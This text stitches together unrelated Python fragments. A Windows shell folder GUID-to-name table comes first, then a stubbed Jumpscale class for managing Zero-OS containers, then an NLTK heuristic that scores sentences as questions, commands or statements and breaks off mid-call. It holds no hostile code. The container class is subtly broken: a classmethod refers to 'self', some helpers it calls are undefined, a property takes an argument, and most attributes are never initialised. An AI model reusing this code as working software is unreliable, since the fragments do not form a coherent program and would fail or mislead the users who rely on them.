"437ff9c0-a07f-4fa0-af80-84b6c6440a16": "Command Folder",
"450d8fba-ad25-11d0-98a8-0800361b1103": "My Documents",
"4564b25e-30cd-4787-82ba-39e73a750b14": "Recent Items Instance Folder",
"45c6afa5-2c13-402f-bc5d-45cc8172ef6b": "Toshiba Bluetooth Stack",
"46137b78-0ec3-426d-8b89-ff7c3a458b5e": "Network Neighborhood",
"46e06680-4bf0-11d1-83ee-00a0c90dc849": "NETWORK_DOMAIN",
"48daf80b-e6cf-4f4e-b800-0e69d84ee384": "Libraries",
"48e7caab-b918-4e58-a94d-505519c795dc": "Start Menu Folder",
"491e922f-5643-4af4-a7eb-4e7a138d8174": "Videos",
"4bd8d571-6d19-48d3-be97-422220080e43": "Music",
"4bfefb45-347d-4006-a5be-ac0cb0567192": "Conflicts",
"4c5c32ff-bb9d-43b0-b5b4-2d72e54eaaa4": "Saved Games",
"4d9f7874-4e0c-4904-967b-40b0d20c3e4b": "Internet",
"4dcafe13-e6a7-4c28-be02-ca8c2126280d": "Pictures Search Results",
"5224f545-a443-4859-ba23-7b5a95bdc8ef": "People Near Me",
"52528a6b-b9e3-4add-b60d-588c2dba842d": "Homegroup",
"52a4f021-7b75-48a9-9f6b-4b87a210bc8f": "Quick Launch",
"5399e694-6ce5-4d6c-8fce-1d8870fdcba0": "Control Panel command object for Start menu and desktop",
"54a754c0-4bf1-11d1-83ee-00a0c90dc849": "NETWORK_SHARE",
"56784854-c6cb-462b-8169-88e350acb882": "Contacts",
"58e3c745-d971-4081-9034-86e34b30836a": "Speech Recognition Options",
"59031a47-3f72-44a7-89c5-5595fe6b30ee": "Shared Documents Folder (Users Files)",
"5b3749ad-b49f-49c1-83eb-15370fbd4882": "TreeProperties",
"5b934b42-522b-4c34-bbfe-37a3ef7b9c90": "This Device Folder",
"5c4f28b5-f869-4e84-8e60-f11db97c5cc7": "Generic (All folder items)",
"5cd7aee2-2219-4a67-b85d-6c9ce15660cb": "Programs",
"5ce4a5e9-e4eb-479d-b89f-130c02886155": "DeviceMetadataStore",
"5e6c858f-0e22-4760-9afe-ea3317b67173": "Profile",
"5e8fc967-829a-475c-93ea-51fce6d9ffce": "RealPlayer Cloud",
"5ea4f148-308c-46d7-98a9-49041b1dd468": "Mobility Center Control Panel",
"5f4eab9a-6833-4f61-899d-31cf46979d49": "Generic library",
"5fa947b5-650a-4374-8a9a-5efa4f126834": "OpenDrive",
"5fa96407-7e77-483c-ac93-691d05850de8": "Videos",
"5fcd4425-ca3a-48f4-a57c-b8a75c32acb1": "Hewlett-Packard Recovery (Protect.dll)",
"60632754-c523-4b62-b45c-4172da012619": "User Accounts",
"625b53c3-ab48-4ec1-ba1f-a1ef4146fc19": "Start Menu",
"62ab5d82-fdc1-4dc3-a9dd-070d1d495d97": "ProgramData",
"62d8ed13-c9d0-4ce8-a914-47dd628fb1b0": "Regional and Language Options",
"631958a6-ad0f-4035-a745-28ac066dc6ed": "Videos Library",
"6365d5a7-0f0d-45e5-87f6-0da56b6a4f7d": "Common Files",
"63da6ec0-2e98-11cf-8d82-444553540000": "Microsoft FTP Folder",
"640167b4-59b0-47a6-b335-a6b3c0695aea": "Portable Media Devices",
"645ff040-5081-101b-9f08-00aa002f954e": "Recycle bin",
"64693913-1c21-4f30-a98f-4e52906d3b56": "App Instance Folder",
"67718415-c450-4f3c-bf8a-b487642dc39b": "Windows Features",
"6785bfac-9d2d-4be5-b7e2-59937e8fb80a": "Other Users Folder",
"679f85cb-0220-4080-b29b-5540cc05aab6": "Home Folder",
"67ca7650-96e6-4fdd-bb43-a8e774f73a57": "Home Group Control Panel (Home Group)",
"692f0339-cbaa-47e6-b5b5-3b84db604e87": "Extensions Manager Folder",
"69d2cf90-fc33-4fb7-9a0c-ebb0f0fcb43c": "Slide Shows",
"6c8eec18-8d75-41b2-a177-8831d59d2d50": "Mouse",
"6dfd7c5c-2451-11d3-a299-00c04f8ef6af": "Folder Options",
"6f0cd92b-2e97-45d1-88ff-b0d186b8dedd": "Network Connections",
"7007acc7-3202-11d1-aad2-00805fc1270e": "Network Connections",
"708e1662-b832-42a8-bbe1-0a77121e3908": "Tree property value folder",
"71689ac1-cc88-45d0-8a22-2943c3e7dfb3": "Music Search Results",
"71d99464-3b6b-475c-b241-e15883207529": "Sync Results Folder",
"724ef170-a42d-4fef-9f26-b60e846fba4f": "Administrative tools",
"725be8f7-668e-4c7b-8f90-46bdb0936430": "Keyboard",
"72b36e70-8700-42d6-a7f7-c9ab3323ee51": "Search Connector Folder",
"74246bfc-4c96-11d0-abef-0020af6b0b7a": "Device Manager",
"767e6811-49cb-4273-87c2-20f355e1085b": "Camera Roll",
"76fc4e2d-d6ad-4519-a663-37bd56068185": "Printers",
"78cb147a-98ea-4aa6-b0df-c8681f69341c": "Windows CardSpace",
"78f3955e-3b90-4184-bd14-5397c15f1efc": "Performance Information and Tools",
"7a979262-40ce-46ff-aeee-7884ac3b6136": "Add Hardware",
"7a9d77bd-5403-11d2-8785-2e0420524153": "User Accounts (Users and Passwords)",
"7b0db17d-9cd2-4a93-9733-46cc89022e7c": "Documents",
"7b396e54-9ec5-4300-be0a-2482ebae1a26": "Gadgets",
"7b81be6a-ce2b-4676-a29e-eb907a5126c5": "Programs and Features",
"7bd29e00-76c1-11cf-9dd0-00a0c9034933": "Temporary Internet Files",
"7bd29e01-76c1-11cf-9dd0-00a0c9034933": "Temporary Internet Files",
"7be9d83c-a729-4d97-b5a7-1b7313c39e0a": "Programs Folder",
"7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e": "Program Files",
"7d1d3a04-debb-4115-95cf-2f29da2920da": "Searches",
"7d49d726-3c21-4f05-99aa-fdc2c9474656": "Documents",
"7e636bfe-dfa9-4d5e-b456-d7b39851d8a9": "Templates",
"7fde1a1e-8b31-49a5-93b8-6be14cfa4943": "Generic Search Results",
"80213e82-bcfd-4c4f-8817-bb27601267a9": "Compressed Folder (zip folder)",
"8060b2e3-c9d7-4a5d-8c6b-ce8eba111328": "Proximity CPL",
"80f3f1d5-feca-45f3-bc32-752c152e456e": "Tablet PC Settings",
"82a5ea35-d9cd-47c5-9629-e15d2f714e6e": "CommonStartup",
"82a74aeb-aeb4-465c-a014-d097ee346d63": "Control Panel",
"82ba0782-5b7a-4569-b5d7-ec83085f08cc": "TopViews",
"8343457c-8703-410f-ba8b-8b026e431743": "Feedback Tool",
"859ead94-2e85-48ad-a71a-0969cb56a6cd": "Sample Videos",
"85bbd920-42a0-1069-a2e4-08002b30309d": "Briefcase",
"863aa9fd-42df-457b-8e4d-0de1b8015c60": "Remote Printers",
"865e5e76-ad83-4dca-a109-50dc2113ce9a": "Programs Folder and Fast Items",
"871c5380-42a0-1069-a2ea-08002b30309d": "Internet Explorer (Homepage)",
"87630419-6216-4ff8-a1f0-143562d16d5c": "Mobile Broadband Profile Settings Editor",
"877ca5ac-cb41-4842-9c69-9136e42d47e2": "File Backup Index",
"87d66a43-7b11-4a28-9811-c86ee395acf7": "Indexing Options",
"88c6c381-2e85-11d0-94de-444553540000": "ActiveX Cache Folder",
"896664f7-12e1-490f-8782-c0835afd98fc": "Libraries delegate folder that appears in Users Files Folder",
"8983036c-27c0-404b-8f08-102d10dcfd74": "SendTo",
"89d83576-6bd1-4c86-9454-beb04e94c819": "MAPI Folder",
"8ad10c31-2adb-4296-a8f7-e4701232c972": "Resources",
"8e74d236-7f35-4720-b138-1fed0b85ea75": "OneDrive",
"8e908fc9-becc-40f6-915b-f4ca0e70d03d": "Network and Sharing Center",
"8fd8b88d-30e1-4f25-ac2b-553d3d65f0ea": "DXP",
"905e63b6-c1bf-494e-b29c-65b732d3d21a": "Program Files",
"9113a02d-00a3-46b9-bc5f-9c04daddd5d7": "Enhanced Storage Data Source",
"9274bd8d-cfd1-41c3-b35e-b13f55a758f4": "Printer Shortcuts",
"93412589-74d4-4e4e-ad0e-e0cb621440fd": "Font Settings",
"9343812e-1c37-4a49-a12e-4b2d810d956b": "Search Home",
"94d6ddcc-4a68-4175-a374-bd584a510b78": "Music",
"96437431-5a90-4658-a77c-25478734f03e": "Server Manager",
"96ae8d84-a250-4520-95a5-a47a7e3c548b": "Parental Controls",
"978e0ed7-92d6-4cec-9b59-3135b9c49ccf": "Music library",
"98d99750-0b8a-4c59-9151-589053683d73": "Windows Search Service Media Center Namespace Extension Handler",
"98ec0e18-2098-4d44-8644-66979315a281": "Microsoft Office Outlook",
"98f275b4-4fff-11e0-89e2-7b86dfd72085": "Start Menu Launcher Provider Folder",
"992cffa0-f557-101a-88ec-00dd010ccc48": "Network Connections",
"9a096bb5-9dc3-4d1c-8526-c3cbf991ea4e": "Internet Explorer RSS Feeds Folder",
"9b74b6a3-0dfd-4f11-9e78-5f7800f2e772": "The user's username (%USERNAME%)",
"9c60de1e-e5fc-40f4-a487-460851a8d915": "AutoPlay",
"9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf": "Sync Center",
"9db7a13c-f208-4981-8353-73cc61ae2783": "Previous Versions",
"9e3995ab-1f9c-4f13-b827-48b24b6c7174": "User Pinned",
"9e52ab10-f80d-49df-acb8-4330f5687855": "CDBurning",
"9f433b7c-5f96-4ce1-ac28-aeaa1cc04d7c": "Security Center",
"9fe63afd-59cf-4419-9775-abcc3849f861": "System Recovery",
"a00ee528-ebd9-48b8-944a-8942113d46ac": "Start Menu Commanding Provider Folder",
"a0275511-0e86-4eca-97c2-ecd8f1221d08": "Infrared",
"a0953c92-50dc-43bf-be83-3742fed03c9c": "Videos",
"a302545d-deff-464b-abe8-61c8648d939b": "Libraries",
"a304259d-52b8-4526-8b1a-a1d6cecc8243": "iSCSI Initiator",
"a305ce99-f527-492b-8b1a-7e76fa98d6e4": "Installed Updates",
"a3918781-e5f2-4890-b3d9-a7e54332328c": "Application Shortcuts",
"a3c3d402-e56c-4033-95f7-4885e80b0111": "Previous Versions Results Delegate Folder",
"a3dd4f92-658a-410f-84fd-6fbbbef2fffe": "Internet Options",
"a4115719-d62e-491d-aa7c-e74b8be3b067": "Start Menu",
"a5110426-177d-4e08-ab3f-785f10b4439c": "Sony Ericsson File Manager",
"a520a1a4-1780-4ff6-bd18-167343c5af16": "AppDataLow",
"a52bba46-e9e1-435f-b3d9-28daa648c0f6": "OneDrive",
"a5a3563a-5755-4a6f-854e-afa3230b199f": "Library Folder",
"a5e46e3a-8849-11d1-9d8c-00c04fc99d61": "Microsoft Browser Architecture",
"a63293e8-664e-48db-a079-df759e0509f7": "Templates",
"a6482830-08eb-41e2-84c1-73920c2badb9": "Removable Storage Devices",
"a75d362e-50fc-4fb7-ac2c-a8beaa314493": "SidebarParts",
"a77f5d77-2e2b-44c3-a6a2-aba601054a51": "Programs",
"a8a91a66-3a7d-4424-8d24-04e180695c7a": "Device Center(Devices and Printers)",
"a8cdff1c-4878-43be-b5fd-f8091c1c60d0": "Documents",
"a990ae9f-a03b-4e80-94bc-9912d7504104": "Pictures",
"aaa8d5a5-f1d6-4259-baa8-78e7ef60835e": "RoamedTileImages",
"ab4f43ca-adcd-4384-b9af-3cecea7d6544": "Sitios Web",
"ab5fb87b-7ce2-4f83-915d-550846c9537b": "Camera Roll",
"ae50c081-ebd2-438a-8655-8a092e34987a": "Recent Items",
"aee2420f-d50e-405c-8784-363c582bf45a": "Device Pairing Folder",
"afdb1f70-2a4c-11d2-9039-00c04f8eeb3e": "Offline Files Folder",
"b155bdf8-02f0-451e-9a26-ae317cfd7779": "Delegate folder that appears in Computer",
"b250c668-f57d-4ee1-a63c-290ee7d1aa1f": "Sample Music",
"b28aa736-876b-46da-b3a8-84c5e30ba492": "Web sites",
"b2952b16-0e07-4e5a-b993-58c52cb94cae": "DB Folder",
"b2c761c6-29bc-4f19-9251-e6195265baf1": "Color Management",
"b3690e58-e961-423b-b687-386ebfd83239": "Pictures folder",
"b4bfcc3a-db2c-424c-b029-7fe99a87c641": "Desktop",
"b4fb3f98-c1ea-428d-a78a-d1f5659cba93": "Other Users Folder",
"b5947d7f-b489-4fde-9e77-23780cc610d1": "Virtual Machines",
"b689b0d0-76d3-4cbb-87f7-585d0e0ce070": "Games folder",
"b6ebfb86-6907-413c-9af7-4fc2abf07cc5": "Public Pictures",
"b7534046-3ecb-4c18-be4e-64cd4cb7d6ac": "Recycle Bin",
"b7bede81-df94-4682-a7d8-57a52620b86f": "Screenshots",
"b94237e7-57ac-4347-9151-b08c6c32d1f7": "CommonTemplates",
"b97d20bb-f46a-4c97-ba10-5e3608430854": "Startup",
"b98a2bea-7d42-4558-8bd1-832f41bac6fd": "Backup And Restore (Backup and Restore Center)",
"bb06c0e4-d293-4f75-8a90-cb05b6477eee": "System",
"bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6": "Action Center",
"bc476f4c-d9d7-4100-8d4e-e043f6dec409": "Microsoft Browser Architecture",
"bc48b32f-5910-47f5-8570-5074a8a5636a": "Sync Results Delegate Folder",
"bcb5256f-79f6-4cee-b725-dc34e402fd46": "ImplicitAppShortcuts",
"bcbd3057-ca5c-4622-b42d-bc56db0ae516": "Programs",
"bd7a2e7b-21cb-41b2-a086-b309680c6b7e": "Client Side Cache Folder",
"bd84b380-8ca2-1069-ab1d-08000948f534": "Microsoft Windows Font Folder",
"bd85e001-112e-431e-983b-7b15ac09fff1": "RecordedTV",
"bdbe736f-34f5-4829-abe8-b550e65146c4": "TopViews",
"bdeadf00-c265-11d0-bced-00a0c90ab50f": "Web Folders",
"be122a0e-4503-11da-8bde-f66bad1e3f3a": "Windows Anytime Upgrade",
"bf782cc9-5a52-4a17-806c-2a894ffeeac5": "Language Settings",
"bfb9d5e0-c6a9-404c-b2b2-ae6db6af4968": "Links",
"c0542a90-4bf0-11d1-83ee-00a0c90dc849": "NETWORK_SERVER",
"c1bae2d0-10df-4334-bedd-7aa20b227a9d": "Common OEM Links",
"c1f8339f-f312-4c97-b1c6-ecdf5910c5c0": "Pictures library",
"c291a080-b400-4e34-ae3f-3d2b9637d56c": "UNCFAT IShellFolder Class",
"c2b136e2-d50e-405c-8784-363c582bf43e": "Device Center Initialization",
"c4900540-2379-4c75-844b-64e6faf8716b": "Sample Pictures",
"c4aa340d-f20f-4863-afef-f87ef2e6ba25": "Public Desktop",
"c4d98f09-6124-4fe0-9942-826416082da9": "Users libraries",
"c555438b-3c23-4769-a71f-b6d3d9b6053a": "Display",
"c57a6066-66a3-4d91-9eb9-41532179f0a5": "Application Suggested Locations",
"c58c4893-3be0-4b45-abb5-a63e4b8c8651": "Troubleshooting",
"c5abbf53-e17f-4121-8900-86626fc2c973": "Network Shortcuts",
"c870044b-f49e-4126-a9c3-b52a1ff411e8": "Ringtones",
"cac52c1a-b53d-4edc-92d7-6b2e8ac19434": "Games",
"cb1b7f8c-c50a-4176-b604-9e24dee8d4d1": "Welcome Center",
"cce6191f-13b2-44fa-8d14-324728beef2c": "{Unknown CSIDL}",
"d0384e7d-bac3-4797-8f14-cba229b392b5": "Administrative Tools",
"d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3": "Text to Speech",
"d2035edf-75cb-4ef1-95a7-410d9ee17170": "DLNA Content Directory Data Source",
"d20beec4-5ca8-4905-ae3b-bf251ea09b53": "Network",
"d20ea4e1-3957-11d2-a40b-0c5020524152": "Fonts",
"d20ea4e1-3957-11d2-a40b-0c5020524153": "Administrative Tools",
"d24f75aa-4f2b-4d07-a3c4-469b3d9030c4": "Offline Files",
"d34a6ca6-62c2-4c34-8a7c-14709c1ad938": "Common Places FS Folder",
"d426cfd0-87fc-4906-98d9-a23f5d515d61": "Windows Search Service Outlook Express Protocol Handler",
"d4480a50-ba28-11d1-8e75-00c04fa31a86": "Add Network Place",
"d450a8a1-9568-45c7-9c0e-b4f9fb4537bd": "Installed Updates",
"d555645e-d4f8-4c29-a827-d93c859c4f2a": "Ease of Access",
"d5b1944e-db4e-482e-b3f1-db05827f0978": "Softex OmniPass Encrypted Folder",
"d6277990-4c6a-11cf-8d87-00aa0060f5bf": "Scheduled Tasks",
"d65231b0-b2f1-4857-a4ce-a8e7c6ea7d27": "System32",
"d8559eb9-20c0-410e-beda-7ed416aecc2a": "Windows Defender",
"d9dc8a3b-b784-432e-a781-5a1130a75963": "History",
"d9ef8727-cac2-4e60-809e-86f80a666c91": "Secure Startup (BitLocker Drive Encryption)",
"da3f6866-35fe-4229-821a-26553a67fc18": "General (Generic) library",
}
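# Example lookup against the table above: a GUID parsed out of a shell item can be
# resolved to a friendly name, falling back to a placeholder when unknown, e.g.
#     known_guids.get("374de290-123f-4565-9164-39c4925e467b", "{unknown}")  # -> "Downloads"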
import time
import signal
import netaddr
from io import BytesIO
from Jumpscale import j
class ZOSContainer(j.baseclasses.object_config):
_SCHEMATEXT = """
@url = jumpscale.clients.zoscmd.zoscontainer.1
name** = "" (S)
zos_node_instance = "" (S) #name to the instance of the ZOSNode
ssh_client_instance = "" (S) #name of the ssh client instance (if already created), namne will be zos_container_$name
flist = ""
env = "" #k
ports = "" (dict)
"""
def _init(self, ZOSNode):
self.ZOSNode = None # links to the ZOSNode which hosts this ZOSContainer
# TODO: need to add relevant info in schema above
# self.name = name
# self.node = node
# self.mounts = mounts or {}
# self.hostname = hostname
# self.flist = flist
# self.ports = ports or {}
# self._nics = nics or []
# self.host_network = host_network
# self.storage = storage
# self.init_processes = init_processes or []
# self.privileged = privileged
# self._identity = identity
# self.env = env or {}
# self._client = None
# self.logger = logger or default_logger
#
# for nic in self.nics:
# nic.pop('ztClient', None)
# if nic.get('config', {}).get('gateway', ''):
# nic['monitor'] = True
# TODO: need to go over all methods & make compatible with our config mgmt
@classmethod
def from_containerinfo(cls, containerinfo, node, logger=None):
logger = logger or default_logger
self._log_debug("create container from info")
arguments = containerinfo["container"]["arguments"]
return cls(
name=arguments["name"],
node=node,
flist=arguments["root"],
hostname=arguments["hostname"],
mounts=arguments["mount"],
nics=arguments["nics"],
host_network=arguments["host_network"],
ports=arguments["port"],
storage=arguments["storage"],
privileged=arguments["privileged"],
identity=arguments["identity"],
env=arguments["env"],
logger=logger,
)
@property
def zos_client(self):
"""
return zos protocol client
:return:
"""
pass
@property
def ssh_client(self):
"""
:return: ssh client to this container
"""
pass
# implement caching at client side
def start(self):
if not self.is_running():
self._log_debug("start %s", self)
self._create_container()
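            # Expected shape of an init_processes entry consumed by the loop
            # below (illustrative values only):
            #   {"name": "/bin/mydaemon", "args": ["-v"], "pwd": "/",
            #    "id": "mydaemon", "stdin": "", "environment": ["PATH=/bin", "DEBUG=1"]}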
for process in self.init_processes:
cmd = "{} {}".format(process["name"], " ".join(process.get("args", [])))
pwd = process.get("pwd", "")
stdin = process.get("stdin", "")
id = process.get("id")
env = {}
for x in process.get("environment", []):
k, v = x.split("=")
env[k] = v
self.client.system(command=cmd, dir=pwd, stdin=stdin, env=env, id=id)
            assert self.is_running()
def stop(self):
"""
will stop the container and also his mountpoints
:return:
"""
if not self.is_running():
return
self._log_debug("stop %s", self)
self.node.client.container.terminate(self.id)
self._client = None
def is_running(self):
return self.node.is_running() and self.id is not None
#
def test(self):
pass
# do a basic test, look for client (e.g. start an ubuntu 18.04 container)
# make connection
# some test
@property
def id(self):
self._log_debug("get container id")
info = self.info
if info:
return info["container"]["id"]
return
@property
def info(self):
self._log_debug("get container info")
for containerid, container in self.node.client.container.list().items():
if self.name == container["container"]["arguments"]["name"]:
containerid = int(containerid)
container["container"]["arguments"]["identity"] = self._identity
if self._client and self._client.container != containerid:
self._client = None
container["container"]["id"] = int(containerid)
return container
return
@property
def identity(self):
if not self._identity:
if self.is_running():
for nic in self.nics:
if nic["type"] == "zerotier":
self._identity = self.client.zerotier.info()["secretIdentity"]
return self._identity
@property
def public_identity(self):
if self.is_running():
for nic in self.nics:
if nic["type"] == "zerotier":
return self.client.zerotier.info()["publicIdentity"]
@property
def ipv6(self, interface=None):
"""
return a list of all the ipv6 present in the container
the local ip are skipped
:param interface: only return the ips of a certain interface.
If none scan all the existing interfaces , defaults to None
:param interface: str, optional
:return: list of ip
:rtype: list
"""
interfaces = [interface]
if interface is None:
interfaces = [l["name"] for l in self.client.ip.link.list() if l["name"] not in ["lo"]]
ips = []
for interface in interfaces:
for ip in self.client.ip.addr.list(interface):
network = netaddr.IPNetwork(ip)
if network.version == 6 and network.is_link_local() is False:
ips.append(network.ip)
return ips
def default_ip(self, interface=None):
"""
Returns the ip if the container has a default nic
:return: netaddr.IPNetwork
"""
if interface is None:
for route in self.client.ip.route.list():
if route["gw"]:
interface = route["dev"]
break
else:
raise j.exceptions.NotFound("Could not find default interface")
for ipaddress in self.client.ip.addr.list(interface):
ip = netaddr.IPNetwork(ipaddress)
if ip.version == 4:
break
else:
raise j.exceptions.NotFound("Failed to get default ip")
return ip
def add_nic(self, nic):
self.node.client.container.nic_add(self.id, nic)
def remove_nic(self, nicname):
for idx, nic in enumerate(self.info["container"]["arguments"]["nics"]):
if nic["state"] == "configured" and nic["name"] == nicname:
break
else:
return
self.node.client.container.nic_remove(self.id, idx)
@property
def client(self):
if not self._client:
self._client = self.node.client.container.client(self.id)
return self._client
def upload_content(self, remote, content):
if isinstance(content, str):
content = content.encode("utf8")
bytes = BytesIO(content)
self.client.filesystem.upload(remote, bytes)
def download_content(self, remote):
buff = BytesIO()
self.client.filesystem.download(remote, buff)
return buff.getvalue().decode()
def _create_container(self, timeout=60):
self._log_debug("send create container command to zero-os (%s)", self.flist)
tags = [self.name]
if self.hostname and self.hostname != self.name:
tags.append(self.hostname)
# Populate the correct mounts dict
if type(self.mounts) == list:
mounts = {}
for mount in self.mounts:
try:
sp = self.node.storagepools.get(mount["storagepool"])
fs = sp.get(mount["filesystem"])
except KeyError:
continue
mounts[fs.path] = mount["target"]
self.mounts = mounts
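            # Example of the normalization above (hypothetical values): a list such as
            #   [{"storagepool": "sp0", "filesystem": "fs0", "target": "/data"}]
            # becomes {fs.path: "/data"}, i.e. a mapping of the filesystem path on
            # the node to the mount target inside the container.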
job = self.node.client.container.create(
root_url=self.flist,
mount=self.mounts,
host_network=self.host_network,
nics=self.nics,
port=self.ports,
tags=tags,
name=self.name,
hostname=self.hostname,
storage=self.storage,
privileged=self.privileged,
identity=self.identity,
env=self.env,
)
if self.is_running():
self.identity
self._client = self.node.client.container.client(int(job.get(timeout)))
def is_job_running(self, id):
try:
for _ in self.client.job.list(id):
return True
return False
except Exception as err:
            if "invalid container id" in str(err):
return False
raise
def stop_job(self, id, timeout=30):
        sig = signal.SIGTERM  # avoid shadowing the signal module
is_running = self.is_job_running(id)
if not is_running:
return
self._log_debug("stop job: %s", id)
self.client.job.kill(id)
# wait for the daemon to stop
start = time.time()
end = start + timeout
is_running = self.is_job_running(id)
while is_running and time.time() < end:
time.sleep(1)
is_running = self.is_job_running(id)
if is_running:
raise j.exceptions.Base("Failed to stop job {}".format(id))
def is_port_listening(self, port, timeout=60, network=("tcp", "tcp6")):
def is_listening():
for lport in self.client.info.port():
if lport["network"] in network and lport["port"] == port:
return True
return False
if timeout:
start = time.time()
while start + timeout > time.time():
if is_listening():
return True
time.sleep(1)
return False
else:
return is_listening()
@property
def nics(self):
if self.is_running():
return list(filter(lambda nic: nic["state"] == "configured", self.info["container"]["arguments"]["nics"]))
else:
nics = []
for nic in self._nics:
nic.pop("state", None)
nics.append(nic)
return nics
def waitOnJob(self, job):
MAX_LOG = 15
logs = []
def callback(lvl, message, flag):
if len(logs) == MAX_LOG:
logs.pop(0)
logs.append(message)
if flag & 0x4 != 0:
                errorMessage = " ".join(logs)
                raise j.exceptions.Base(errorMessage)
resp = self.client.subscribe(job.id)
resp.stream(callback)
def get_forwarded_port(self, port):
for k, v in self.ports.items():
if v == port:
return int(k.split(":")[-1])
def authorize_networks(self, nics):
public_identity = self.public_identity
if not public_identity:
raise j.exceptions.Base("Failed to get zerotier public identity")
for nic in nics:
if nic["type"] == "zerotier":
client = j.clients.zerotier.get(nic["ztClient"], create=False, die=True, interactive=False)
network = client.network_get(nic["id"])
network.member_add(public_identity, self.name)
@property
def mgmt_addr(self):
return get_zt_ip(self.client.info.nic())
def __str__(self):
return j.core.tools.text_replace(
"{RED}zoscontainer{RESET}:%-14s %-25s:%-4s" % (self.name, self.addr, self.port)
)
__repr__ = __str__
# @property
# def identity(self):
# if not self._identity:
# if self.is_running():
# for nic in self.nics:
# if nic['type'] == 'zerotier':
# self._identity = self.client.zerotier.info()['secretIdentity']
# return self._identity
#
# @property
# def ipv6(self, interface=None):
# """
# return a list of all the ipv6 present in the container
#
# the local ip are skipped
#
# :param interface: only return the ips of a certain interface.
# If none scan all the existing interfaces , defaults to None
# :param interface: str, optional
# :return: list of ip
# :rtype: list
# """
#
# interfaces = [interface]
# if interface is None:
# interfaces = [l['name'] for l in self.client.ip.link.list() if l['name'] not in ['lo']]
#
# ips = []
# for interface in interfaces:
# for ip in self.client.ip.addr.list(interface):
# network = netaddr.IPNetwork(ip)
# if network.version == 6 and network.is_link_local() is False:
# ips.append(network.ip)
# return ips
#
# def default_ip(self, interface=None):
# """
# Returns the ip if the container has a default nic
# :return: netaddr.IPNetwork
# """
# if interface is None:
# for route in self.client.ip.route.list():
# if route['gw']:
# interface = route['dev']
# break
# else:
# raise j.exceptions.NotFound('Could not find default interface')
# for ipaddress in self.client.ip.addr.list(interface):
# ip = netaddr.IPNetwork(ipaddress)
# if ip.version == 4:
# break
# else:
# raise j.exceptions.NotFound('Failed to get default ip')
# return ip
#
# def add_nic(self, nic):
# self.node.client.container.nic_add(self.id, nic)
#
# def remove_nic(self, nicname):
# for idx, nic in enumerate(self.info['container']['arguments']['nics']):
# if nic['state'] == 'configured' and nic['name'] == nicname:
# break
# else:
# return
# self.node.client.container.nic_remove(self.id, idx)
#
# @property
# def client(self):
# if not self._client:
# self._client = self.node.client.container.client(self.id)
# return self._client
#
from nltk import word_tokenize, pos_tag
# begin of sentence indicators for Yes/No questions
YES_NO_STARTERS = ["would", "is", "will", "does", "can", "has", "if",
"could", "are", "should", "have", "has", "did"]
# begin of sentence indicators for "command" questions, eg, "do this"
# non exhaustive list, should capture common voice interactions
COMMAND_STARTERS = [
"name", "define", "list", "tell", "say"
]
ALL_POS_TAGS = ['NNPS', '--', '.', 'POS', 'RB', 'UH', 'SYM', '(', 'JJR', 'WDT',
'PRP', 'NNS', 'JJS', '$', 'JJ', 'IN', 'EX', 'CC', 'NN', 'MD',
'``', ',', 'RBR', ':', 'PDT', 'WP', 'RP', 'WP$', 'TO', 'VBP',
'WRB', 'VB', 'VBG', 'VBN', ')', 'DT', "''", 'PRP$', 'VBZ',
'VBD', 'FW', 'LS', 'CD', 'NNP', 'RBS']
# no good dataset for training, so this will work for now....
# TODO create dataset...
class SentenceScorerEN:
@staticmethod
def predict(text):
score = SentenceScorerEN.score(text)
best = max(score, key=lambda key: score[key])
return best
@staticmethod
def score(text):
return {
"question": SentenceScorerEN.question_score(text),
"statement": SentenceScorerEN.statement_score(text),
"exclamation": SentenceScorerEN.exclamation_score(text),
"command": SentenceScorerEN.command_score(text),
"request": SentenceScorerEN.request_score(text)
}
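    # Example usage (illustrative; actual scores depend on the installed NLTK
    # tokenizer/tagger models):
    #   SentenceScorerEN.predict("What time is it?")   # most likely -> "question"
    #   SentenceScorerEN.score("Open the door!")       # dict of per-class scores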
@staticmethod
def _score(text, last_tokens=None, first_tokens=None,
start_pos_tags=None, end_pos_tags=None, unlikely_words=None,
unlikely_start_pos_tag=None, unlikely_end_pos_tag=None,
unlikely_pos_tag=None):
score = 8
last_tokens = last_tokens or []
first_tokens = first_tokens or []
start_pos_tags = start_pos_tags or []
end_pos_tags = end_pos_tags or []
unlikely_words = unlikely_words or []
unlikely_start_pos_tag = unlikely_start_pos_tag or [t for t in
ALL_POS_TAGS if
t not in
start_pos_tags]
unlikely_end_pos_tag = unlikely_end_pos_tag or []
unlikely_pos_tag = unlikely_pos_tag or unlikely_end_pos_tag + unlikely_start_pos_tag
tokens = word_tokenize(text)
tagged = pos_tag(tokens)
if not tokens[-1] in last_tokens:
score -= 1
if not tokens[0] in first_tokens:
score -= 1
if not tagged[0][1] in start_pos_tags:
score -= 1
if not tagged[-1][1] in end_pos_tags:
score -= 1
if tagged[0][1] in unlikely_start_pos_tag:
score -= 1
if tagged[-1][1] in unlikely_end_pos_tag:
score -= 1
for pos in tagged:
if pos[1] in unlikely_pos_tag:
score -= 0.1
for tok in tokens:
if tok in unlikely_words:
score -= 0.2
if score <= 0:
return 0
return max(score / 7, 0)
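    # Worked example of the arithmetic above (hypothetical sentence): starting
    # from 8, failing two of the six one-point structural checks and containing
    # one unlikely word gives 8 - 2 - 0.2 = 5.8, which is returned as 5.8 / 7 ≈ 0.83.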
@staticmethod
def question_score(text):
"""
Questions can have two patterns. Some can have ‘yes’ or ‘no’ as an answer.
For example,
Do you like Paris?,
Can you speak Russian?
Will you marry me?
Alternatively, they have a pattern that asks an ‘open’ question
which can have any number of answers, e.g.
What did you have for breakfast?
Which newspaper do you read?
Who is your favourite actor?
"""
# ends with a question mark
last_tokens = ["?"]
# starts with a question word
first_tokens = ["what", "why", "how", "when", "who", "whose",
"which"] + YES_NO_STARTERS
# WDT wh-determiner which
# WP wh-pronoun who, what
# WP$ possessive wh-pronoun whose
# WRB wh-abverb where, when
start_pos_tags = ["WDT", "WP", "WP$", "WRB", "VB", "VBP", "VBZ",
"VBN", "VBG"]
# pos_tags more likely to be in the end of question
# questions likely end with a question mark or
# Noun/Pronoun/Adjective, usually not verbs
end_pos_tags = [".", "NN", "NNP", "NNS", "NNPS", "PRP", "JJ"]
# all pos tags are unlikely except W*
unlikely_words = ["!"]
unlikely_start_pos_tag = [t for t in ALL_POS_TAGS if t not in
start_pos_tags]
unlikely_end_pos_tag = []
unlikely_pos_tag = []
score = SentenceScorerEN._score(text, last_tokens, first_tokens,
